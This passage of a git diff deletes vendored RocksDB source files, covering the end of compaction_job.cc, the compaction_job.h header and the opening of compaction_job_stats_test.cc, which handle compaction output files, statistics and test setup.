-      input_status = input->status();
-      output_file_ended = true;
-    }
-    if (output_file_ended) {
-      const Slice* next_key = nullptr;
-      if (c_iter->Valid()) {
-        next_key = &c_iter->key();
-      }
-      CompactionIterationStats range_del_out_stats;
-      status = FinishCompactionOutputFile(input_status, sub_compact,
-                                          range_del_agg.get(),
-                                          &range_del_out_stats, next_key);
-      RecordDroppedKeys(range_del_out_stats,
-                        &sub_compact->compaction_job_stats);
-      if (sub_compact->outputs.size() == 1) {
-        // Use dictionary from first output file for compression of subsequent
-        // files.
-        sub_compact->compression_dict = std::move(compression_dict);
-      }
-    }
-  }
-
-  sub_compact->num_input_records = c_iter_stats.num_input_records;
-  sub_compact->compaction_job_stats.num_input_deletion_records =
-      c_iter_stats.num_input_deletion_records;
-  sub_compact->compaction_job_stats.num_corrupt_keys =
-      c_iter_stats.num_input_corrupt_records;
-  sub_compact->compaction_job_stats.num_single_del_fallthru =
-      c_iter_stats.num_single_del_fallthru;
-  sub_compact->compaction_job_stats.num_single_del_mismatch =
-      c_iter_stats.num_single_del_mismatch;
-  sub_compact->compaction_job_stats.total_input_raw_key_bytes +=
-      c_iter_stats.total_input_raw_key_bytes;
-  sub_compact->compaction_job_stats.total_input_raw_value_bytes +=
-      c_iter_stats.total_input_raw_value_bytes;
-
-  RecordTick(stats_, FILTER_OPERATION_TOTAL_TIME,
-             c_iter_stats.total_filter_time);
-  RecordDroppedKeys(c_iter_stats, &sub_compact->compaction_job_stats);
-  RecordCompactionIOStats();
-
-  if (status.ok() && (shutting_down_->load(std::memory_order_relaxed) ||
-                      cfd->IsDropped())) {
-    status = Status::ShutdownInProgress(
-        "Database shutdown or Column family drop during compaction");
-  }
-  if (status.ok()) {
-    status = input->status();
-  }
-  if (status.ok()) {
-    status = c_iter->status();
-  }
-
-  if (status.ok() && sub_compact->builder == nullptr &&
-      sub_compact->outputs.size() == 0 &&
-      range_del_agg->ShouldAddTombstones(bottommost_level_)) {
-    // handle subcompaction containing only range deletions
-    status = OpenCompactionOutputFile(sub_compact);
-  }
-
-  // Call FinishCompactionOutputFile() even if status is not ok: it needs to
-  // close the output file.
-  if (sub_compact->builder != nullptr) {
-    CompactionIterationStats range_del_out_stats;
-    Status s = FinishCompactionOutputFile(
-        status, sub_compact, range_del_agg.get(), &range_del_out_stats);
-    if (status.ok()) {
-      status = s;
-    }
-    RecordDroppedKeys(range_del_out_stats, &sub_compact->compaction_job_stats);
-  }
-
-  if (measure_io_stats_) {
-    sub_compact->compaction_job_stats.file_write_nanos +=
-        IOSTATS(write_nanos) - prev_write_nanos;
-    sub_compact->compaction_job_stats.file_fsync_nanos +=
-        IOSTATS(fsync_nanos) - prev_fsync_nanos;
-    sub_compact->compaction_job_stats.file_range_sync_nanos +=
-        IOSTATS(range_sync_nanos) - prev_range_sync_nanos;
-    sub_compact->compaction_job_stats.file_prepare_write_nanos +=
-        IOSTATS(prepare_write_nanos) - prev_prepare_write_nanos;
-    if (prev_perf_level != PerfLevel::kEnableTime) {
-      SetPerfLevel(prev_perf_level);
-    }
-  }
-
-  sub_compact->c_iter.reset();
-  input.reset();
-  sub_compact->status = status;
-}
-
-void CompactionJob::RecordDroppedKeys(
-    const CompactionIterationStats& c_iter_stats,
-    CompactionJobStats* compaction_job_stats) {
-  if (c_iter_stats.num_record_drop_user > 0) {
-    RecordTick(stats_, COMPACTION_KEY_DROP_USER,
-               c_iter_stats.num_record_drop_user);
-  }
-  if (c_iter_stats.num_record_drop_hidden > 0) {
-    RecordTick(stats_, COMPACTION_KEY_DROP_NEWER_ENTRY,
-               c_iter_stats.num_record_drop_hidden);
-    if (compaction_job_stats) {
-      compaction_job_stats->num_records_replaced +=
-          c_iter_stats.num_record_drop_hidden;
-    }
-  }
-  if (c_iter_stats.num_record_drop_obsolete > 0) {
-    RecordTick(stats_, COMPACTION_KEY_DROP_OBSOLETE,
-               c_iter_stats.num_record_drop_obsolete);
-    if (compaction_job_stats) {
-      compaction_job_stats->num_expired_deletion_records +=
-          c_iter_stats.num_record_drop_obsolete;
-    }
-  }
-  if (c_iter_stats.num_record_drop_range_del > 0) {
-    RecordTick(stats_, COMPACTION_KEY_DROP_RANGE_DEL,
-               c_iter_stats.num_record_drop_range_del);
-  }
-  if (c_iter_stats.num_range_del_drop_obsolete > 0) {
-    RecordTick(stats_, COMPACTION_RANGE_DEL_DROP_OBSOLETE,
-               c_iter_stats.num_range_del_drop_obsolete);
-  }
-  if (c_iter_stats.num_optimized_del_drop_obsolete > 0) {
-    RecordTick(stats_, COMPACTION_OPTIMIZED_DEL_DROP_OBSOLETE,
-               c_iter_stats.num_optimized_del_drop_obsolete);
-  }
-}
-
-Status CompactionJob::FinishCompactionOutputFile(
-    const Status& input_status, SubcompactionState* sub_compact,
-    RangeDelAggregator* range_del_agg,
-    CompactionIterationStats* range_del_out_stats,
-    const Slice* next_table_min_key /* = nullptr */) {
-  AutoThreadOperationStageUpdater stage_updater(
-      ThreadStatus::STAGE_COMPACTION_SYNC_FILE);
-  assert(sub_compact != nullptr);
-  assert(sub_compact->outfile);
-  assert(sub_compact->builder != nullptr);
-  assert(sub_compact->current_output() != nullptr);
-
-  uint64_t output_number = sub_compact->current_output()->meta.fd.GetNumber();
-  assert(output_number != 0);
-
-  // Check for iterator errors
-  Status s = input_status;
-  auto meta = &sub_compact->current_output()->meta;
-  if (s.ok()) {
-    Slice lower_bound_guard, upper_bound_guard;
-    const Slice *lower_bound, *upper_bound;
-    if (sub_compact->outputs.size() == 1) {
-      // For the first output table, include range tombstones before the min key
-      // but after the subcompaction boundary.
-      lower_bound = sub_compact->start;
-    } else if (meta->smallest.size() > 0) {
-      // For subsequent output tables, only include range tombstones from min
-      // key onwards since the previous file was extended to contain range
-      // tombstones falling before min key.
-      lower_bound_guard = meta->smallest.user_key();
-      lower_bound = &lower_bound_guard;
-    } else {
-      lower_bound = nullptr;
-    }
-    if (next_table_min_key != nullptr) {
-      // This isn't the last file in the subcompaction, so extend until the next
-      // file starts.
-      upper_bound_guard = ExtractUserKey(*next_table_min_key);
-      upper_bound = &upper_bound_guard;
-    } else {
-      // This is the last file in the subcompaction, so extend until the
-      // subcompaction ends.
-      upper_bound = sub_compact->end;
-    }
-    range_del_agg->AddToBuilder(sub_compact->builder.get(), lower_bound,
-                                upper_bound, meta, range_del_out_stats,
-                                bottommost_level_);
-  }
-  const uint64_t current_entries = sub_compact->builder->NumEntries();
-  meta->marked_for_compaction = sub_compact->builder->NeedCompact();
-  if (s.ok()) {
-    s = sub_compact->builder->Finish();
-  } else {
-    sub_compact->builder->Abandon();
-  }
-  const uint64_t current_bytes = sub_compact->builder->FileSize();
-  meta->fd.file_size = current_bytes;
-  sub_compact->current_output()->finished = true;
-  sub_compact->total_bytes += current_bytes;
-
-  // Finish and check for file errors
-  if (s.ok()) {
-    StopWatch sw(env_, stats_, COMPACTION_OUTFILE_SYNC_MICROS);
-    s = sub_compact->outfile->Sync(db_options_.use_fsync);
-  }
-  if (s.ok()) {
-    s = sub_compact->outfile->Close();
-  }
-  sub_compact->outfile.reset();
-
-  if (s.ok() && current_entries == 0) {
-    // If there is nothing to output, no necessary to generate a sst file.
-    // This happens when the output level is bottom level, at the same time
-    // the sub_compact output nothing.
-    std::string fname = TableFileName(
-        db_options_.db_paths, meta->fd.GetNumber(), meta->fd.GetPathId());
-    env_->DeleteFile(fname);
-
-    // Also need to remove the file from outputs, or it will be added to the
-    // VersionEdit.
-    assert(!sub_compact->outputs.empty());
-    sub_compact->outputs.pop_back();
-    sub_compact->builder.reset();
-    sub_compact->current_output_file_size = 0;
-    return s;
-  }
-
-  ColumnFamilyData* cfd = sub_compact->compaction->column_family_data();
-  TableProperties tp;
-  if (s.ok() && current_entries > 0) {
-    // Verify that the table is usable
-    // We set for_compaction to false and don't OptimizeForCompactionTableRead
-    // here because this is a special case after we finish the table building
-    // No matter whether use_direct_io_for_flush_and_compaction is true,
-    // we will regrad this verification as user reads since the goal is
-    // to cache it here for further user reads
-    InternalIterator* iter = cfd->table_cache()->NewIterator(
-        ReadOptions(), env_options_, cfd->internal_comparator(), meta->fd,
-        nullptr /* range_del_agg */, nullptr,
-        cfd->internal_stats()->GetFileReadHist(
-            compact_->compaction->output_level()),
-        false);
-    s = iter->status();
-
-    if (s.ok() && paranoid_file_checks_) {
-      for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {}
-      s = iter->status();
-    }
-
-    delete iter;
-
-    // Output to event logger and fire events.
-    if (s.ok()) {
-      tp = sub_compact->builder->GetTableProperties();
-      sub_compact->current_output()->table_properties =
-          std::make_shared<TableProperties>(tp);
-      ROCKS_LOG_INFO(db_options_.info_log,
-                     "[%s] [JOB %d] Generated table #%" PRIu64 ": %" PRIu64
-                     " keys, %" PRIu64 " bytes%s",
-                     cfd->GetName().c_str(), job_id_, output_number,
-                     current_entries, current_bytes,
-                     meta->marked_for_compaction ? " (need compaction)" : "");
-    }
-  }
-  std::string fname = TableFileName(db_options_.db_paths, meta->fd.GetNumber(),
-                                    meta->fd.GetPathId());
-  EventHelpers::LogAndNotifyTableFileCreationFinished(
-      event_logger_, cfd->ioptions()->listeners, dbname_, cfd->GetName(), fname,
-      job_id_, meta->fd, tp, TableFileCreationReason::kCompaction, s);
-
-#ifndef ROCKSDB_LITE
-  // Report new file to SstFileManagerImpl
-  auto sfm =
-      static_cast<SstFileManagerImpl*>(db_options_.sst_file_manager.get());
-  if (sfm && meta->fd.GetPathId() == 0) {
-    auto fn = TableFileName(cfd->ioptions()->db_paths, meta->fd.GetNumber(),
-                            meta->fd.GetPathId());
-    sfm->OnAddFile(fn);
-    if (sfm->IsMaxAllowedSpaceReached()) {
-      // TODO(ajkr): should we return OK() if max space was reached by the final
-      // compaction output file (similarly to how flush works when full)?
-      s = Status::IOError("Max allowed space was reached");
-      TEST_SYNC_POINT(
-          "CompactionJob::FinishCompactionOutputFile:"
-          "MaxAllowedSpaceReached");
-      InstrumentedMutexLock l(db_mutex_);
-      if (db_bg_error_->ok()) {
-        Status new_bg_error = s;
-        // may temporarily unlock and lock the mutex.
-        EventHelpers::NotifyOnBackgroundError(
-            cfd->ioptions()->listeners, BackgroundErrorReason::kCompaction,
-            &new_bg_error, db_mutex_);
-        if (!new_bg_error.ok()) {
-          *db_bg_error_ = new_bg_error;
-        }
-      }
-    }
-  }
-#endif
-
-  sub_compact->builder.reset();
-  sub_compact->current_output_file_size = 0;
-  return s;
-}
-
-Status CompactionJob::InstallCompactionResults(
-    const MutableCFOptions& mutable_cf_options) {
-  db_mutex_->AssertHeld();
-
-  auto* compaction = compact_->compaction;
-  // paranoia: verify that the files that we started with
-  // still exist in the current version and in the same original level.
-  // This ensures that a concurrent compaction did not erroneously
-  // pick the same files to compact_.
-  if (!versions_->VerifyCompactionFileConsistency(compaction)) {
-    Compaction::InputLevelSummaryBuffer inputs_summary;
-
-    ROCKS_LOG_ERROR(db_options_.info_log, "[%s] [JOB %d] Compaction %s aborted",
-                    compaction->column_family_data()->GetName().c_str(),
-                    job_id_, compaction->InputLevelSummary(&inputs_summary));
-    return Status::Corruption("Compaction input files inconsistent");
-  }
-
-  {
-    Compaction::InputLevelSummaryBuffer inputs_summary;
-    ROCKS_LOG_INFO(
-        db_options_.info_log, "[%s] [JOB %d] Compacted %s => %" PRIu64 " bytes",
-        compaction->column_family_data()->GetName().c_str(), job_id_,
-        compaction->InputLevelSummary(&inputs_summary), compact_->total_bytes);
-  }
-
-  // Add compaction outputs
-  compaction->AddInputDeletions(compact_->compaction->edit());
-
-  for (const auto& sub_compact : compact_->sub_compact_states) {
-    for (const auto& out : sub_compact.outputs) {
-      compaction->edit()->AddFile(compaction->output_level(), out.meta);
-    }
-  }
-  return versions_->LogAndApply(compaction->column_family_data(),
-                                mutable_cf_options, compaction->edit(),
-                                db_mutex_, db_directory_);
-}
-
-void CompactionJob::RecordCompactionIOStats() {
-  RecordTick(stats_, COMPACT_READ_BYTES, IOSTATS(bytes_read));
-  ThreadStatusUtil::IncreaseThreadOperationProperty(
-      ThreadStatus::COMPACTION_BYTES_READ, IOSTATS(bytes_read));
-  IOSTATS_RESET(bytes_read);
-  RecordTick(stats_, COMPACT_WRITE_BYTES, IOSTATS(bytes_written));
-  ThreadStatusUtil::IncreaseThreadOperationProperty(
-      ThreadStatus::COMPACTION_BYTES_WRITTEN, IOSTATS(bytes_written));
-  IOSTATS_RESET(bytes_written);
-}
-
-Status CompactionJob::OpenCompactionOutputFile(
-    SubcompactionState* sub_compact) {
-  assert(sub_compact != nullptr);
-  assert(sub_compact->builder == nullptr);
-  // no need to lock because VersionSet::next_file_number_ is atomic
-  uint64_t file_number = versions_->NewFileNumber();
-  std::string fname = TableFileName(db_options_.db_paths, file_number,
-                                    sub_compact->compaction->output_path_id());
-  // Fire events.
-  ColumnFamilyData* cfd = sub_compact->compaction->column_family_data();
-#ifndef ROCKSDB_LITE
-  EventHelpers::NotifyTableFileCreationStarted(
-      cfd->ioptions()->listeners, dbname_, cfd->GetName(), fname, job_id_,
-      TableFileCreationReason::kCompaction);
-#endif  // !ROCKSDB_LITE
-  // Make the output file
-  unique_ptr<WritableFile> writable_file;
-  EnvOptions opt_env_opts =
-      env_->OptimizeForCompactionTableWrite(env_options_, db_options_);
-  TEST_SYNC_POINT_CALLBACK("CompactionJob::OpenCompactionOutputFile",
-                           &opt_env_opts.use_direct_writes);
-  Status s = NewWritableFile(env_, fname, &writable_file, opt_env_opts);
-  if (!s.ok()) {
-    ROCKS_LOG_ERROR(
-        db_options_.info_log,
-        "[%s] [JOB %d] OpenCompactionOutputFiles for table #%" PRIu64
-        " fails at NewWritableFile with status %s",
-        sub_compact->compaction->column_family_data()->GetName().c_str(),
-        job_id_, file_number, s.ToString().c_str());
-    LogFlush(db_options_.info_log);
-    EventHelpers::LogAndNotifyTableFileCreationFinished(
-        event_logger_, cfd->ioptions()->listeners, dbname_, cfd->GetName(),
-        fname, job_id_, FileDescriptor(), TableProperties(),
-        TableFileCreationReason::kCompaction, s);
-    return s;
-  }
-
-  SubcompactionState::Output out;
-  out.meta.fd =
-      FileDescriptor(file_number, sub_compact->compaction->output_path_id(), 0);
-  out.finished = false;
-
-  sub_compact->outputs.push_back(out);
-  writable_file->SetIOPriority(Env::IO_LOW);
-  writable_file->SetPreallocationBlockSize(static_cast<size_t>(
-      sub_compact->compaction->OutputFilePreallocationSize()));
-  sub_compact->outfile.reset(new WritableFileWriter(
-      std::move(writable_file), env_options_, db_options_.statistics.get()));
-
-  // If the Column family flag is to only optimize filters for hits,
-  // we can skip creating filters if this is the bottommost_level where
-  // data is going to be found
-  bool skip_filters =
-      cfd->ioptions()->optimize_filters_for_hits && bottommost_level_;
-
-  uint64_t output_file_creation_time =
-      sub_compact->compaction->MaxInputFileCreationTime();
-  if (output_file_creation_time == 0) {
-    int64_t _current_time = 0;
-    db_options_.env->GetCurrentTime(&_current_time);  // ignore error
-    output_file_creation_time = static_cast<uint64_t>(_current_time);
-  }
-
-  sub_compact->builder.reset(NewTableBuilder(
-      *cfd->ioptions(), cfd->internal_comparator(),
-      cfd->int_tbl_prop_collector_factories(), cfd->GetID(), cfd->GetName(),
-      sub_compact->outfile.get(), sub_compact->compaction->output_compression(),
-      cfd->ioptions()->compression_opts,
-      sub_compact->compaction->output_level(), &sub_compact->compression_dict,
-      skip_filters, output_file_creation_time));
-  LogFlush(db_options_.info_log);
-  return s;
-}
-
-void CompactionJob::CleanupCompaction() {
-  for (SubcompactionState& sub_compact : compact_->sub_compact_states) {
-    const auto& sub_status = sub_compact.status;
-
-    if (sub_compact.builder != nullptr) {
-      // May happen if we get a shutdown call in the middle of compaction
-      sub_compact.builder->Abandon();
-      sub_compact.builder.reset();
-    } else {
-      assert(!sub_status.ok() || sub_compact.outfile == nullptr);
-    }
-    for (const auto& out : sub_compact.outputs) {
-      // If this file was inserted into the table cache then remove
-      // them here because this compaction was not committed.
-      if (!sub_status.ok()) {
-        TableCache::Evict(table_cache_.get(), out.meta.fd.GetNumber());
-      }
-    }
-  }
-  delete compact_;
-  compact_ = nullptr;
-}
-
-#ifndef ROCKSDB_LITE
-namespace {
-void CopyPrefix(
-    const Slice& src, size_t prefix_length, std::string* dst) {
-  assert(prefix_length > 0);
-  size_t length = src.size() > prefix_length ? prefix_length : src.size();
-  dst->assign(src.data(), length);
-}
-}  // namespace
-
-#endif  // !ROCKSDB_LITE
-
-void CompactionJob::UpdateCompactionStats() {
-  Compaction* compaction = compact_->compaction;
-  compaction_stats_.num_input_files_in_non_output_levels = 0;
-  compaction_stats_.num_input_files_in_output_level = 0;
-  for (int input_level = 0;
-       input_level < static_cast<int>(compaction->num_input_levels());
-       ++input_level) {
-    if (compaction->level(input_level) != compaction->output_level()) {
-      UpdateCompactionInputStatsHelper(
-          &compaction_stats_.num_input_files_in_non_output_levels,
-          &compaction_stats_.bytes_read_non_output_levels,
-          input_level);
-    } else {
-      UpdateCompactionInputStatsHelper(
-          &compaction_stats_.num_input_files_in_output_level,
-          &compaction_stats_.bytes_read_output_level,
-          input_level);
-    }
-  }
-
-  for (const auto& sub_compact : compact_->sub_compact_states) {
-    size_t num_output_files = sub_compact.outputs.size();
-    if (sub_compact.builder != nullptr) {
-      // An error occurred so ignore the last output.
-      assert(num_output_files > 0);
-      --num_output_files;
-    }
-    compaction_stats_.num_output_files += static_cast<int>(num_output_files);
-
-    for (const auto& out : sub_compact.outputs) {
-      compaction_stats_.bytes_written += out.meta.fd.file_size;
-    }
-    if (sub_compact.num_input_records > sub_compact.num_output_records) {
-      compaction_stats_.num_dropped_records +=
-          sub_compact.num_input_records - sub_compact.num_output_records;
-    }
-  }
-}
-
-void CompactionJob::UpdateCompactionInputStatsHelper(
-    int* num_files, uint64_t* bytes_read, int input_level) {
-  const Compaction* compaction = compact_->compaction;
-  auto num_input_files = compaction->num_input_files(input_level);
-  *num_files += static_cast<int>(num_input_files);
-
-  for (size_t i = 0; i < num_input_files; ++i) {
-    const auto* file_meta = compaction->input(input_level, i);
-    *bytes_read += file_meta->fd.GetFileSize();
-    compaction_stats_.num_input_records +=
-        static_cast<uint64_t>(file_meta->num_entries);
-  }
-}
-
-void CompactionJob::UpdateCompactionJobStats(
-    const InternalStats::CompactionStats& stats) const {
-#ifndef ROCKSDB_LITE
-  if (compaction_job_stats_) {
-    compaction_job_stats_->elapsed_micros = stats.micros;
-
-    // input information
-    compaction_job_stats_->total_input_bytes =
-        stats.bytes_read_non_output_levels +
-        stats.bytes_read_output_level;
-    compaction_job_stats_->num_input_records =
-        compact_->num_input_records;
-    compaction_job_stats_->num_input_files =
-        stats.num_input_files_in_non_output_levels +
-        stats.num_input_files_in_output_level;
-    compaction_job_stats_->num_input_files_at_output_level =
-        stats.num_input_files_in_output_level;
-
-    // output information
-    compaction_job_stats_->total_output_bytes = stats.bytes_written;
-    compaction_job_stats_->num_output_records =
-        compact_->num_output_records;
-    compaction_job_stats_->num_output_files = stats.num_output_files;
-
-    if (compact_->NumOutputFiles() > 0U) {
-      CopyPrefix(
-          compact_->SmallestUserKey(),
-          CompactionJobStats::kMaxPrefixLength,
-          &compaction_job_stats_->smallest_output_key_prefix);
-      CopyPrefix(
-          compact_->LargestUserKey(),
-          CompactionJobStats::kMaxPrefixLength,
-          &compaction_job_stats_->largest_output_key_prefix);
-    }
-  }
-#endif  // !ROCKSDB_LITE
-}
-
-void CompactionJob::LogCompaction() {
-  Compaction* compaction = compact_->compaction;
-  ColumnFamilyData* cfd = compaction->column_family_data();
-
-  // Let's check if anything will get logged. Don't prepare all the info if
-  // we're not logging
-  if (db_options_.info_log_level <= InfoLogLevel::INFO_LEVEL) {
-    Compaction::InputLevelSummaryBuffer inputs_summary;
-    ROCKS_LOG_INFO(
-        db_options_.info_log, "[%s] [JOB %d] Compacting %s, score %.2f",
-        cfd->GetName().c_str(), job_id_,
-        compaction->InputLevelSummary(&inputs_summary), compaction->score());
-    char scratch[2345];
-    compaction->Summary(scratch, sizeof(scratch));
-    ROCKS_LOG_INFO(db_options_.info_log, "[%s] Compaction start summary: %s\n",
-                   cfd->GetName().c_str(), scratch);
-    // build event logger report
-    auto stream = event_logger_->Log();
-    stream << "job" << job_id_ << "event"
-           << "compaction_started";
-    for (size_t i = 0; i < compaction->num_input_levels(); ++i) {
-      stream << ("files_L" + ToString(compaction->level(i)));
-      stream.StartArray();
-      for (auto f : *compaction->inputs(i)) {
-        stream << f->fd.GetNumber();
-      }
-      stream.EndArray();
-    }
-    stream << "score" << compaction->score() << "input_data_size"
-           << compaction->CalculateTotalInputSize();
-  }
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/compaction_job.h b/thirdparty/rocksdb/db/compaction_job.h
deleted file mode 100644
index 6ca5d62..0000000
--- a/thirdparty/rocksdb/db/compaction_job.h
+++ /dev/null
@@ -1,165 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#pragma once
-
-#include <atomic>
-#include <deque>
-#include <functional>
-#include <limits>
-#include <set>
-#include <string>
-#include <utility>
-#include <vector>
-
-#include "db/column_family.h"
-#include "db/compaction_iterator.h"
-#include "db/dbformat.h"
-#include "db/flush_scheduler.h"
-#include "db/internal_stats.h"
-#include "db/job_context.h"
-#include "db/log_writer.h"
-#include "db/memtable_list.h"
-#include "db/range_del_aggregator.h"
-#include "db/version_edit.h"
-#include "db/write_controller.h"
-#include "db/write_thread.h"
-#include "options/db_options.h"
-#include "port/port.h"
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/compaction_job_stats.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/transaction_log.h"
-#include "table/scoped_arena_iterator.h"
-#include "util/autovector.h"
-#include "util/event_logger.h"
-#include "util/stop_watch.h"
-#include "util/thread_local.h"
-
-namespace rocksdb {
-
-class MemTable;
-class TableCache;
-class Version;
-class VersionEdit;
-class VersionSet;
-class Arena;
-
-class CompactionJob {
- public:
-  CompactionJob(int job_id, Compaction* compaction,
-                const ImmutableDBOptions& db_options,
-                const EnvOptions& env_options, VersionSet* versions,
-                const std::atomic<bool>* shutting_down, LogBuffer* log_buffer,
-                Directory* db_directory, Directory* output_directory,
-                Statistics* stats, InstrumentedMutex* db_mutex,
-                Status* db_bg_error,
-                std::vector<SequenceNumber> existing_snapshots,
-                SequenceNumber earliest_write_conflict_snapshot,
-                std::shared_ptr<Cache> table_cache, EventLogger* event_logger,
-                bool paranoid_file_checks, bool measure_io_stats,
-                const std::string& dbname,
-                CompactionJobStats* compaction_job_stats);
-
-  ~CompactionJob();
-
-  // no copy/move
-  CompactionJob(CompactionJob&& job) = delete;
-  CompactionJob(const CompactionJob& job) = delete;
-  CompactionJob& operator=(const CompactionJob& job) = delete;
-
-  // REQUIRED: mutex held
-  void Prepare();
-  // REQUIRED mutex not held
-  Status Run();
-
-  // REQUIRED: mutex held
-  Status Install(const MutableCFOptions& mutable_cf_options);
-
- private:
-  struct SubcompactionState;
-
-  void AggregateStatistics();
-  void GenSubcompactionBoundaries();
-
-  // update the thread status for starting a compaction.
-  void ReportStartedCompaction(Compaction* compaction);
-  void AllocateCompactionOutputFileNumbers();
-  // Call compaction filter. Then iterate through input and compact the
-  // kv-pairs
-  void ProcessKeyValueCompaction(SubcompactionState* sub_compact);
-
-  Status FinishCompactionOutputFile(
-      const Status& input_status, SubcompactionState* sub_compact,
-      RangeDelAggregator* range_del_agg,
-      CompactionIterationStats* range_del_out_stats,
-      const Slice* next_table_min_key = nullptr);
-  Status InstallCompactionResults(const MutableCFOptions& mutable_cf_options);
-  void RecordCompactionIOStats();
-  Status OpenCompactionOutputFile(SubcompactionState* sub_compact);
-  void CleanupCompaction();
-  void UpdateCompactionJobStats(
-    const InternalStats::CompactionStats& stats) const;
-  void RecordDroppedKeys(const CompactionIterationStats& c_iter_stats,
-                         CompactionJobStats* compaction_job_stats = nullptr);
-
-  void UpdateCompactionStats();
-  void UpdateCompactionInputStatsHelper(
-      int* num_files, uint64_t* bytes_read, int input_level);
-
-  void LogCompaction();
-
-  int job_id_;
-
-  // CompactionJob state
-  struct CompactionState;
-  CompactionState* compact_;
-  CompactionJobStats* compaction_job_stats_;
-  InternalStats::CompactionStats compaction_stats_;
-
-  // DBImpl state
-  const std::string& dbname_;
-  const ImmutableDBOptions& db_options_;
-  const EnvOptions& env_options_;
-
-  Env* env_;
-  VersionSet* versions_;
-  const std::atomic<bool>* shutting_down_;
-  LogBuffer* log_buffer_;
-  Directory* db_directory_;
-  Directory* output_directory_;
-  Statistics* stats_;
-  InstrumentedMutex* db_mutex_;
-  Status* db_bg_error_;
-  // If there were two snapshots with seq numbers s1 and
-  // s2 and s1 < s2, and if we find two instances of a key k1 then lies
-  // entirely within s1 and s2, then the earlier version of k1 can be safely
-  // deleted because that version is not visible in any snapshot.
-  std::vector<SequenceNumber> existing_snapshots_;
-
-  // This is the earliest snapshot that could be used for write-conflict
-  // checking by a transaction.  For any user-key newer than this snapshot, we
-  // should make sure not to remove evidence that a write occurred.
-  SequenceNumber earliest_write_conflict_snapshot_;
-
-  std::shared_ptr<Cache> table_cache_;
-
-  EventLogger* event_logger_;
-
-  bool bottommost_level_;
-  bool paranoid_file_checks_;
-  bool measure_io_stats_;
-  // Stores the Slices that designate the boundaries for each subcompaction
-  std::vector<Slice> boundaries_;
-  // Stores the approx size of keys covered in the range of each subcompaction
-  std::vector<uint64_t> sizes_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/compaction_job_stats_test.cc b/thirdparty/rocksdb/db/compaction_job_stats_test.cc
deleted file mode 100644
index 9a8372f..0000000
--- a/thirdparty/rocksdb/db/compaction_job_stats_test.cc
+++ /dev/null
@@ -1,1047 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <algorithm>
-#include <iostream>
-#include <mutex>
-#include <queue>
-#include <set>
-#include <thread>
-#include <unordered_set>
-#include <utility>
-
-#include "db/db_impl.h"
-#include "db/dbformat.h"
-#include "db/job_context.h"
-#include "db/version_set.h"
-#include "db/write_batch_internal.h"
-#include "env/mock_env.h"
-#include "memtable/hash_linklist_rep.h"
-#include "monitoring/statistics.h"
-#include "monitoring/thread_status_util.h"
-#include "port/stack_trace.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/convenience.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/experimental.h"
-#include "rocksdb/filter_policy.h"
-#include "rocksdb/options.h"
-#include "rocksdb/perf_context.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/table.h"
-#include "rocksdb/table_properties.h"
-#include "rocksdb/thread_status.h"
-#include "rocksdb/utilities/checkpoint.h"
-#include "rocksdb/utilities/write_batch_with_index.h"
-#include "table/block_based_table_factory.h"
-#include "table/mock_table.h"
-#include "table/plain_table_factory.h"
-#include "table/scoped_arena_iterator.h"
-#include "util/compression.h"
-#include "util/filename.h"
-#include "util/hash.h"
-#include "util/logging.h"
-#include "util/mutexlock.h"
-#include "util/rate_limiter.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-#include "utilities/merge_operators.h"
-
-#if !defined(IOS_CROSS_COMPILE)
-#ifndef ROCKSDB_LITE
-namespace rocksdb {
-
-static std::string RandomString(Random* rnd, int len, double ratio) {
-  std::string r;
-  test::CompressibleString(rnd, ratio, len, &r);
-  return r;
-}
-
-std::string Key(uint64_t key, int length) {
-  const int kBufSize = 1000;
-  char buf[kBufSize];
-  if (length > kBufSize) {
-    length = kBufSize;
-  }
-  snprintf(buf, kBufSize, "%0*" PRIu64, length, key);
-  return std::string(buf);
-}
-
-class CompactionJobStatsTest : public testing::Test,
-                               public testing::WithParamInterface<bool> {
- public:
-  std::string dbname_;
-  std::string alternative_wal_dir_;
-  Env* env_;
-  DB* db_;
-  std::vector<ColumnFamilyHandle*> handles_;
-  uint32_t max_subcompactions_;
-
-  Options last_options_;
-
-  CompactionJobStatsTest() : env_(Env::Default()) {
-    env_->SetBackgroundThreads(1, Env::LOW);
-    env_->SetBackgroundThreads(1, Env::HIGH);
-    dbname_ = test::TmpDir(env_) + "/compaction_job_stats_test";
-    alternative_wal_dir_ = dbname_ + "/wal";
-    Options options;
-    options.create_if_missing = true;
-    max_subcompactions_ = GetParam();
-    options.max_subcompactions = max_subcompactions_;
-    auto delete_options = options;
-    delete_options.wal_dir = alternative_wal_dir_;
-    EXPECT_OK(DestroyDB(dbname_, delete_options));
-    // Destroy it for not alternative WAL dir is used.
-    EXPECT_OK(DestroyDB(dbname_, options));
-    db_ = nullptr;
-    Reopen(options);
-  }
-
-  ~CompactionJobStatsTest() {
-    rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-    rocksdb::SyncPoint::GetInstance()->LoadDependency({});
